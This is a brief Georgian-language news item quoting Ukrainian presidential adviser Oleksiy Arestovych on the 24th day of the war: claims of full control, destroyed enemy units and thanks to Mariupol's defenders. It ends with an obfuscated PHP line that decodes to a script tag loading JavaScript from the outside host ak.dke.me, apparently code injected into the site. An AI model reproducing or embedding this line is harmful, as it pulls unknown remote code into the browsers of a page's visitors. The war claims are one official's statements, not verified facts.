celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტის ადმინისტრაციის ხელმძღვანელის მრჩეველის, ოლექსეი არესტოვიჩის განცხადებით, რომ უკრაინული მხარე ქვეყნის ტერიტორიაზე ვითარებას სრულად აკონტროლებს.
 
მისივე თქმით, უკრაინულმა არმიამ მტრის რამდენიმე რაზმი მთლიანად გაანადგურა.
 
"უკრაინის პოლიტიკური და სამხედრო ხელმძღვანელები ქვეყნის ტერიტორიაზე ვითარებას ბოლომდე აკონტროლებენ. ომის 24-ე დღეს განსაკუთრებული ცვლილებები არ მომხდარა. ამ დრომდე გრძელდება ტაქტიკური დაპირისპირება. მტრის მთავარი სამიზნე ამ დრომდე უცვლელია. ისინი მარიუპოლის, ხერსონის, ვოლნოვახას, იზიუმის და ნიკოლაევის მიმართულებით გადაადგილებას ცდილობენ. უკრაინულმა არმიამ რამდენიმე რაზმი მთლიანად გაანადგურა. განსაკუთრებით დიდი მადლობა მარიუპოლის მცველებს, საზღვაო ფლოტის ბიჭებს და რაზმ აზოვის მებრძოლებს. ეს ადამიანები 400 ათასიან ქალაქს სიცოცხლის ფასად იცავენ და გვეხმარებიან მარიუპოლის დაცვაში", - ამბობს არესტოვიჩი.
 
 
891
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");